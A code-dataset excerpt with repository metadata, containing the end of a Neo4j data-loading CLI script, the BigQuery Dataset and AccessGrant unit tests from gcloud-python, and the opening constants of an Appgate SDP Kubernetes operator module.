def define_cmdline_arguments(parser: argparse.ArgumentParser):
"""Add arguments to parser."""
parser.add_argument(
'PLAY_STORE_DETAILS_DIR', type=str,
help='Directory containing JSON files with details from Google Play.')
parser.add_argument(
'REPO_DETAILS_DIR', type=str,
help='Directory containing CSV files with details from repositories.')
parser.add_argument(
'REPOSITORY_LIST', type=argparse.FileType('r'),
help='''CSV file that lists meta data for repositories and their
snapshots on Gitlab.''')
parser.add_argument(
'--neo4j-host', type=str, default=NEO4J_HOST,
help='''Hostname Neo4j instance is running on. Default:
{}'''.format(NEO4J_HOST))
parser.add_argument(
'--neo4j-port', type=int, default=NEO4J_PORT,
help='Port number of Neo4j instance. Default: {}'.format(NEO4J_PORT))
parser.set_defaults(func=_main)
def _main(args: argparse.Namespace):
"""Pass arguments to respective function."""
__log__.info('------- Arguments: -------')
__log__.info('PLAY_STORE_DETAILS_DIR: %s', args.PLAY_STORE_DETAILS_DIR)
__log__.info('REPO_DETAILS_DIR: %s', args.REPO_DETAILS_DIR)
__log__.info('REPOSITORY_LIST: %s', args.REPOSITORY_LIST.name)
__log__.info('--neo4j-host: %s', args.neo4j_host)
__log__.info('--neo4j-port: %d', args.neo4j_port)
__log__.info('------- Arguments end -------')
neo4j_user = os.getenv('NEO4J_USER')
__log__.info('Use `%s` to login to Neo4j', neo4j_user)
neo4j_password = os.getenv('NEO4J_PASSWORD')
__log__.info('Read Neo4j password from environment')
with Neo4j(NEO4J_HOST, neo4j_user, neo4j_password, NEO4J_PORT) as neo4j:
add_repository_info(
args.REPOSITORY_LIST, args.PLAY_STORE_DETAILS_DIR, neo4j,
args.REPO_DETAILS_DIR)
| 37.080178
| 79
| 0.628026
|
d9b85cf5fad368c6fe56781b521ae8b78ab70966
| 31,119
|
py
|
Python
|
bigquery/unit_tests/test_dataset.py
|
omaray/gcloud-python
|
87a13aaa140842111df2f76529a1b9ce4b6d28a6
|
[
"Apache-2.0"
] | null | null | null |
bigquery/unit_tests/test_dataset.py
|
omaray/gcloud-python
|
87a13aaa140842111df2f76529a1b9ce4b6d28a6
|
[
"Apache-2.0"
] | null | null | null |
bigquery/unit_tests/test_dataset.py
|
omaray/gcloud-python
|
87a13aaa140842111df2f76529a1b9ce4b6d28a6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestAccessGrant(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.bigquery.dataset import AccessGrant
return AccessGrant
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
self.assertEqual(grant.role, 'OWNER')
self.assertEqual(grant.entity_type, 'userByEmail')
self.assertEqual(grant.entity_id, 'phred@example.com')
def test_ctor_bad_entity_type(self):
with self.assertRaises(ValueError):
self._makeOne(None, 'unknown', None)
def test_ctor_view_with_role(self):
role = 'READER'
entity_type = 'view'
with self.assertRaises(ValueError):
self._makeOne(role, entity_type, None)
def test_ctor_view_success(self):
role = None
entity_type = 'view'
entity_id = object()
grant = self._makeOne(role, entity_type, entity_id)
self.assertEqual(grant.role, role)
self.assertEqual(grant.entity_type, entity_type)
self.assertEqual(grant.entity_id, entity_id)
def test_ctor_nonview_without_role(self):
role = None
entity_type = 'userByEmail'
with self.assertRaises(ValueError):
self._makeOne(role, entity_type, None)
def test___eq___role_mismatch(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
other = self._makeOne('WRITER', 'userByEmail', 'phred@example.com')
self.assertNotEqual(grant, other)
def test___eq___entity_type_mismatch(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
other = self._makeOne('OWNER', 'groupByEmail', 'phred@example.com')
self.assertNotEqual(grant, other)
def test___eq___entity_id_mismatch(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
other = self._makeOne('OWNER', 'userByEmail', 'bharney@example.com')
self.assertNotEqual(grant, other)
def test___eq___hit(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
other = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
self.assertEqual(grant, other)
class TestDataset(unittest.TestCase):
PROJECT = 'project'
DS_NAME = 'dataset-name'
def _getTargetClass(self):
from google.cloud.bigquery.dataset import Dataset
return Dataset
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def _setUpConstants(self):
import datetime
from google.cloud._helpers import UTC
self.WHEN_TS = 1437767599.006
self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(
tzinfo=UTC)
self.ETAG = 'ETAG'
self.DS_ID = '%s:%s' % (self.PROJECT, self.DS_NAME)
self.RESOURCE_URL = 'http://example.com/path/to/resource'
def _makeResource(self):
self._setUpConstants()
USER_EMAIL = 'phred@example.com'
GROUP_EMAIL = 'group-name@lists.example.com'
return {
'creationTime': self.WHEN_TS * 1000,
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
'etag': self.ETAG,
'id': self.DS_ID,
'lastModifiedTime': self.WHEN_TS * 1000,
'location': 'US',
'selfLink': self.RESOURCE_URL,
'access': [
{'role': 'OWNER', 'userByEmail': USER_EMAIL},
{'role': 'OWNER', 'groupByEmail': GROUP_EMAIL},
{'role': 'WRITER', 'specialGroup': 'projectWriters'},
{'role': 'READER', 'specialGroup': 'projectReaders'}],
}
def _verifyAccessGrants(self, access_grants, resource):
r_grants = []
for r_grant in resource['access']:
role = r_grant.pop('role')
for entity_type, entity_id in sorted(r_grant.items()):
r_grants.append({'role': role,
'entity_type': entity_type,
'entity_id': entity_id})
self.assertEqual(len(access_grants), len(r_grants))
for a_grant, r_grant in zip(access_grants, r_grants):
self.assertEqual(a_grant.role, r_grant['role'])
self.assertEqual(a_grant.entity_type, r_grant['entity_type'])
self.assertEqual(a_grant.entity_id, r_grant['entity_id'])
def _verifyReadonlyResourceProperties(self, dataset, resource):
self.assertEqual(dataset.dataset_id, self.DS_ID)
if 'creationTime' in resource:
self.assertEqual(dataset.created, self.WHEN)
else:
self.assertIsNone(dataset.created)
if 'etag' in resource:
self.assertEqual(dataset.etag, self.ETAG)
else:
self.assertIsNone(dataset.etag)
if 'lastModifiedTime' in resource:
self.assertEqual(dataset.modified, self.WHEN)
else:
self.assertIsNone(dataset.modified)
if 'selfLink' in resource:
self.assertEqual(dataset.self_link, self.RESOURCE_URL)
else:
self.assertIsNone(dataset.self_link)
def _verifyResourceProperties(self, dataset, resource):
self._verifyReadonlyResourceProperties(dataset, resource)
if 'defaultTableExpirationMs' in resource:
self.assertEqual(dataset.default_table_expiration_ms,
int(resource.get('defaultTableExpirationMs')))
else:
self.assertIsNone(dataset.default_table_expiration_ms)
self.assertEqual(dataset.description, resource.get('description'))
self.assertEqual(dataset.friendly_name, resource.get('friendlyName'))
self.assertEqual(dataset.location, resource.get('location'))
if 'access' in resource:
self._verifyAccessGrants(dataset.access_grants, resource)
else:
self.assertEqual(dataset.access_grants, [])
def test_ctor(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
self.assertEqual(dataset.name, self.DS_NAME)
self.assertIs(dataset._client, client)
self.assertEqual(dataset.project, client.project)
self.assertEqual(
dataset.path,
'/projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME))
self.assertEqual(dataset.access_grants, [])
self.assertIsNone(dataset.created)
self.assertIsNone(dataset.dataset_id)
self.assertIsNone(dataset.etag)
self.assertIsNone(dataset.modified)
self.assertIsNone(dataset.self_link)
self.assertIsNone(dataset.default_table_expiration_ms)
self.assertIsNone(dataset.description)
self.assertIsNone(dataset.friendly_name)
self.assertIsNone(dataset.location)
def test_access_roles_setter_non_list(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(TypeError):
dataset.access_grants = object()
def test_access_roles_setter_invalid_field(self):
from google.cloud.bigquery.dataset import AccessGrant
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
phred = AccessGrant('OWNER', 'userByEmail', 'phred@example.com')
with self.assertRaises(ValueError):
dataset.access_grants = [phred, object()]
def test_access_roles_setter(self):
from google.cloud.bigquery.dataset import AccessGrant
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
phred = AccessGrant('OWNER', 'userByEmail', 'phred@example.com')
bharney = AccessGrant('OWNER', 'userByEmail', 'bharney@example.com')
dataset.access_grants = [phred, bharney]
self.assertEqual(dataset.access_grants, [phred, bharney])
def test_default_table_expiration_ms_setter_bad_value(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(ValueError):
dataset.default_table_expiration_ms = 'bogus'
def test_default_table_expiration_ms_setter(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
dataset.default_table_expiration_ms = 12345
self.assertEqual(dataset.default_table_expiration_ms, 12345)
def test_description_setter_bad_value(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(ValueError):
dataset.description = 12345
def test_description_setter(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
dataset.description = 'DESCRIPTION'
self.assertEqual(dataset.description, 'DESCRIPTION')
def test_friendly_name_setter_bad_value(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(ValueError):
dataset.friendly_name = 12345
def test_friendly_name_setter(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
dataset.friendly_name = 'FRIENDLY'
self.assertEqual(dataset.friendly_name, 'FRIENDLY')
def test_location_setter_bad_value(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(ValueError):
dataset.location = 12345
def test_location_setter(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
dataset.location = 'LOCATION'
self.assertEqual(dataset.location, 'LOCATION')
def test_from_api_repr_missing_identity(self):
self._setUpConstants()
client = _Client(self.PROJECT)
RESOURCE = {}
klass = self._getTargetClass()
with self.assertRaises(KeyError):
klass.from_api_repr(RESOURCE, client=client)
def test_from_api_repr_bare(self):
self._setUpConstants()
client = _Client(self.PROJECT)
RESOURCE = {
'id': '%s:%s' % (self.PROJECT, self.DS_NAME),
'datasetReference': {
'projectId': self.PROJECT,
'datasetId': self.DS_NAME,
}
}
klass = self._getTargetClass()
dataset = klass.from_api_repr(RESOURCE, client=client)
self.assertIs(dataset._client, client)
self._verifyResourceProperties(dataset, RESOURCE)
def test_from_api_repr_w_properties(self):
client = _Client(self.PROJECT)
RESOURCE = self._makeResource()
klass = self._getTargetClass()
dataset = klass.from_api_repr(RESOURCE, client=client)
self.assertIs(dataset._client, client)
self._verifyResourceProperties(dataset, RESOURCE)
def test__parse_access_grants_w_unknown_entity_type(self):
ACCESS = [
{'role': 'READER', 'unknown': 'UNKNOWN'},
]
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client=client)
with self.assertRaises(ValueError):
dataset._parse_access_grants(ACCESS)
def test__parse_access_grants_w_extra_keys(self):
USER_EMAIL = 'phred@example.com'
ACCESS = [
{
'role': 'READER',
'specialGroup': 'projectReaders',
'userByEmail': USER_EMAIL,
},
]
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client=client)
with self.assertRaises(ValueError):
dataset._parse_access_grants(ACCESS)
def test_create_w_bound_client(self):
PATH = 'projects/%s/datasets' % self.PROJECT
RESOURCE = self._makeResource()
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.create()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'POST')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_create_w_alternate_client(self):
from google.cloud.bigquery.dataset import AccessGrant
PATH = 'projects/%s/datasets' % self.PROJECT
USER_EMAIL = 'phred@example.com'
GROUP_EMAIL = 'group-name@lists.example.com'
DESCRIPTION = 'DESCRIPTION'
TITLE = 'TITLE'
RESOURCE = self._makeResource()
RESOURCE['description'] = DESCRIPTION
RESOURCE['friendlyName'] = TITLE
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection(RESOURCE)
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.friendly_name = TITLE
dataset.description = DESCRIPTION
VIEW = {
'projectId': 'my-proj',
'datasetId': 'starry-skies',
'tableId': 'northern-hemisphere',
}
dataset.access_grants = [
AccessGrant('OWNER', 'userByEmail', USER_EMAIL),
AccessGrant('OWNER', 'groupByEmail', GROUP_EMAIL),
AccessGrant('READER', 'domain', 'foo.com'),
AccessGrant('READER', 'specialGroup', 'projectReaders'),
AccessGrant('WRITER', 'specialGroup', 'projectWriters'),
AccessGrant(None, 'view', VIEW),
]
dataset.create(client=CLIENT2)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'POST')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'datasetReference': {
'projectId': self.PROJECT,
'datasetId': self.DS_NAME,
},
'description': DESCRIPTION,
'friendlyName': TITLE,
'access': [
{'role': 'OWNER', 'userByEmail': USER_EMAIL},
{'role': 'OWNER', 'groupByEmail': GROUP_EMAIL},
{'role': 'READER', 'domain': 'foo.com'},
{'role': 'READER', 'specialGroup': 'projectReaders'},
{'role': 'WRITER', 'specialGroup': 'projectWriters'},
{'view': VIEW},
],
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_create_w_missing_output_properties(self):
# In the wild, the resource returned from 'dataset.create' sometimes
# lacks 'creationTime' / 'lastModifiedTime'
PATH = 'projects/%s/datasets' % (self.PROJECT,)
RESOURCE = self._makeResource()
del RESOURCE['creationTime']
del RESOURCE['lastModifiedTime']
self.WHEN = None
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.create()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'POST')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_exists_miss_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
conn = _Connection()
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
self.assertFalse(dataset.exists())
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self.assertEqual(req['query_params'], {'fields': 'id'})
def test_exists_hit_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection({})
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
self.assertTrue(dataset.exists(client=CLIENT2))
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self.assertEqual(req['query_params'], {'fields': 'id'})
def test_reload_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
RESOURCE = self._makeResource()
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.reload()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self._verifyResourceProperties(dataset, RESOURCE)
def test_reload_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
RESOURCE = self._makeResource()
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection(RESOURCE)
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.reload(client=CLIENT2)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self._verifyResourceProperties(dataset, RESOURCE)
def test_patch_w_invalid_expiration(self):
RESOURCE = self._makeResource()
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
with self.assertRaises(ValueError):
dataset.patch(default_table_expiration_ms='BOGUS')
def test_patch_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
DESCRIPTION = 'DESCRIPTION'
TITLE = 'TITLE'
RESOURCE = self._makeResource()
RESOURCE['description'] = DESCRIPTION
RESOURCE['friendlyName'] = TITLE
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.patch(description=DESCRIPTION, friendly_name=TITLE)
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'PATCH')
SENT = {
'description': DESCRIPTION,
'friendlyName': TITLE,
}
self.assertEqual(req['data'], SENT)
self.assertEqual(req['path'], '/%s' % PATH)
self._verifyResourceProperties(dataset, RESOURCE)
def test_patch_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
DEF_TABLE_EXP = 12345
LOCATION = 'EU'
RESOURCE = self._makeResource()
RESOURCE['defaultTableExpirationMs'] = str(DEF_TABLE_EXP)
RESOURCE['location'] = LOCATION
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection(RESOURCE)
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.patch(client=CLIENT2,
default_table_expiration_ms=DEF_TABLE_EXP,
location=LOCATION)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'PATCH')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'defaultTableExpirationMs': DEF_TABLE_EXP,
'location': LOCATION,
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_update_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
DESCRIPTION = 'DESCRIPTION'
TITLE = 'TITLE'
RESOURCE = self._makeResource()
RESOURCE['description'] = DESCRIPTION
RESOURCE['friendlyName'] = TITLE
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.description = DESCRIPTION
dataset.friendly_name = TITLE
dataset.update()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'PUT')
SENT = {
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
'description': DESCRIPTION,
'friendlyName': TITLE,
}
self.assertEqual(req['data'], SENT)
self.assertEqual(req['path'], '/%s' % PATH)
self._verifyResourceProperties(dataset, RESOURCE)
def test_update_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
DEF_TABLE_EXP = 12345
LOCATION = 'EU'
RESOURCE = self._makeResource()
RESOURCE['defaultTableExpirationMs'] = 12345
RESOURCE['location'] = LOCATION
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection(RESOURCE)
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.default_table_expiration_ms = DEF_TABLE_EXP
dataset.location = LOCATION
dataset.update(client=CLIENT2)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'PUT')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
'defaultTableExpirationMs': 12345,
'location': 'EU',
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_delete_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
conn = _Connection({})
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.delete()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'DELETE')
self.assertEqual(req['path'], '/%s' % PATH)
def test_delete_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection({})
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.delete(client=CLIENT2)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'DELETE')
self.assertEqual(req['path'], '/%s' % PATH)
def test_list_tables_empty(self):
conn = _Connection({})
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
tables, token = dataset.list_tables()
self.assertEqual(tables, [])
self.assertIsNone(token)
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
PATH = 'projects/%s/datasets/%s/tables' % (self.PROJECT, self.DS_NAME)
self.assertEqual(req['path'], '/%s' % PATH)
def test_list_tables_defaults(self):
from google.cloud.bigquery.table import Table
TABLE_1 = 'table_one'
TABLE_2 = 'table_two'
PATH = 'projects/%s/datasets/%s/tables' % (self.PROJECT, self.DS_NAME)
TOKEN = 'TOKEN'
DATA = {
'nextPageToken': TOKEN,
'tables': [
{'kind': 'bigquery#table',
'id': '%s:%s.%s' % (self.PROJECT, self.DS_NAME, TABLE_1),
'tableReference': {'tableId': TABLE_1,
'datasetId': self.DS_NAME,
'projectId': self.PROJECT},
'type': 'TABLE'},
{'kind': 'bigquery#table',
'id': '%s:%s.%s' % (self.PROJECT, self.DS_NAME, TABLE_2),
'tableReference': {'tableId': TABLE_2,
'datasetId': self.DS_NAME,
'projectId': self.PROJECT},
'type': 'TABLE'},
]
}
conn = _Connection(DATA)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
tables, token = dataset.list_tables()
self.assertEqual(len(tables), len(DATA['tables']))
for found, expected in zip(tables, DATA['tables']):
self.assertIsInstance(found, Table)
self.assertEqual(found.table_id, expected['id'])
self.assertEqual(found.table_type, expected['type'])
self.assertEqual(token, TOKEN)
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
def test_list_tables_explicit(self):
from google.cloud.bigquery.table import Table
TABLE_1 = 'table_one'
TABLE_2 = 'table_two'
PATH = 'projects/%s/datasets/%s/tables' % (self.PROJECT, self.DS_NAME)
TOKEN = 'TOKEN'
DATA = {
'tables': [
{'kind': 'bigquery#dataset',
'id': '%s:%s.%s' % (self.PROJECT, self.DS_NAME, TABLE_1),
'tableReference': {'tableId': TABLE_1,
'datasetId': self.DS_NAME,
'projectId': self.PROJECT},
'type': 'TABLE'},
{'kind': 'bigquery#dataset',
'id': '%s:%s.%s' % (self.PROJECT, self.DS_NAME, TABLE_2),
'tableReference': {'tableId': TABLE_2,
'datasetId': self.DS_NAME,
'projectId': self.PROJECT},
'type': 'TABLE'},
]
}
conn = _Connection(DATA)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
tables, token = dataset.list_tables(max_results=3, page_token=TOKEN)
self.assertEqual(len(tables), len(DATA['tables']))
for found, expected in zip(tables, DATA['tables']):
self.assertIsInstance(found, Table)
self.assertEqual(found.table_id, expected['id'])
self.assertEqual(found.table_type, expected['type'])
self.assertIsNone(token)
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self.assertEqual(req['query_params'],
{'maxResults': 3, 'pageToken': TOKEN})
def test_table_wo_schema(self):
from google.cloud.bigquery.table import Table
conn = _Connection({})
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
table = dataset.table('table_name')
self.assertIsInstance(table, Table)
self.assertEqual(table.name, 'table_name')
self.assertIs(table._dataset, dataset)
self.assertEqual(table.schema, [])
def test_table_w_schema(self):
from google.cloud.bigquery.schema import SchemaField
from google.cloud.bigquery.table import Table
conn = _Connection({})
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
full_name = SchemaField('full_name', 'STRING', mode='REQUIRED')
age = SchemaField('age', 'INTEGER', mode='REQUIRED')
table = dataset.table('table_name', schema=[full_name, age])
self.assertIsInstance(table, Table)
self.assertEqual(table.name, 'table_name')
self.assertIs(table._dataset, dataset)
self.assertEqual(table.schema, [full_name, age])
class _Client(object):
def __init__(self, project='project', connection=None):
self.project = project
self.connection = connection
class _Connection(object):
def __init__(self, *responses):
self._responses = responses
self._requested = []
def api_request(self, **kw):
from google.cloud.exceptions import NotFound
self._requested.append(kw)
try:
response, self._responses = self._responses[0], self._responses[1:]
except:
raise NotFound('miss')
else:
return response
| 39.541296
| 79
| 0.619107
|
aef3b62ef9c04b3a695f887af68d3c3f2f6e7b0c
| 19,772
|
py
|
Python
|
appgate/appgate.py
|
appgate/sdp-operator
|
289927e07eca84003aa4bd4631b57dc9955eee23
|
[
"MIT"
] | 6
|
2020-09-22T13:21:05.000Z
|
2022-01-06T01:49:22.000Z
|
appgate/appgate.py
|
appgate/sdp-operator
|
289927e07eca84003aa4bd4631b57dc9955eee23
|
[
"MIT"
] | 36
|
2020-09-23T06:38:51.000Z
|
2022-02-09T13:53:32.000Z
|
appgate/appgate.py
|
appgate/sdp-operator
|
289927e07eca84003aa4bd4631b57dc9955eee23
|
[
"MIT"
] | 3
|
2021-07-27T18:16:52.000Z
|
2022-03-01T22:18:15.000Z
|
import asyncio
import base64
import binascii
import logging
import os
import sys
import tempfile
from asyncio import Queue
from contextlib import AsyncExitStack
from copy import deepcopy
from pathlib import Path
from typing import Optional, Type, Dict, Callable, Any, FrozenSet, Tuple, Iterable, List, Set
import threading
from attr import attrib, attrs
from kubernetes.client.rest import ApiException
from typedload.exceptions import TypedloadTypeError
from kubernetes.config import load_kube_config, list_kube_config_contexts, load_incluster_config
from kubernetes.client import CustomObjectsApi
from kubernetes.watch import Watch
from appgate.attrs import K8S_LOADER, dump_datetime
from appgate.client import AppgateClient, K8SConfigMapClient, entity_unique_id
from appgate.openapi.types import AppgateException
from appgate.openapi.openapi import generate_api_spec, generate_api_spec_clients, SPEC_DIR
from appgate.openapi.types import APISpec, Entity_T, K8S_APPGATE_VERSION, K8S_APPGATE_DOMAIN, \
APPGATE_METADATA_LATEST_GENERATION_FIELD, APPGATE_METADATA_MODIFICATION_FIELD
from appgate.openapi.utils import is_target, APPGATE_TARGET_TAGS_ENV, BUILTIN_TAGS, APPGATE_EXCLUDE_TAGS_ENV, \
APPGATE_BUILTIN_TAGS_ENV, has_tag
from appgate.secrets import k8s_get_secret
from appgate.state import AppgateState, create_appgate_plan, \
appgate_plan_apply, EntitiesSet, entities_conflict_summary, resolve_appgate_state
from appgate.types import K8SEvent, AppgateEvent, EntityWrapper, EventObject, OperatorArguments
__all__ = [
'init_kubernetes',
'main_loop',
'get_context',
'get_current_appgate_state',
'start_entity_loop',
'Context',
'log',
'exclude_appgate_entities',
]
USER_ENV = 'APPGATE_OPERATOR_USER'
PASSWORD_ENV = 'APPGATE_OPERATOR_PASSWORD'
PROVIDER_ENV = 'APPGATE_OPERATOR_PROVIDER'
DEVICE_ID_ENV = 'APPGATE_OPERATOR_DEVICE_ID'
TIMEOUT_ENV = 'APPGATE_OPERATOR_TIMEOUT'
HOST_ENV = 'APPGATE_OPERATOR_HOST'
DRY_RUN_ENV = 'APPGATE_OPERATOR_DRY_RUN'
CLEANUP_ENV = 'APPGATE_OPERATOR_CLEANUP'
NAMESPACE_ENV = 'APPGATE_OPERATOR_NAMESPACE'
TWO_WAY_SYNC_ENV = 'APPGATE_OPERATOR_TWO_WAY_SYNC'
SPEC_DIR_ENV = 'APPGATE_OPERATOR_SPEC_DIRECTORY'
APPGATE_SECRETS_KEY = 'APPGATE_OPERATOR_FERNET_KEY'
APPGATE_CONFIGMAP_ENV = 'APPGATE_OPERATOR_CONFIG_MAP'
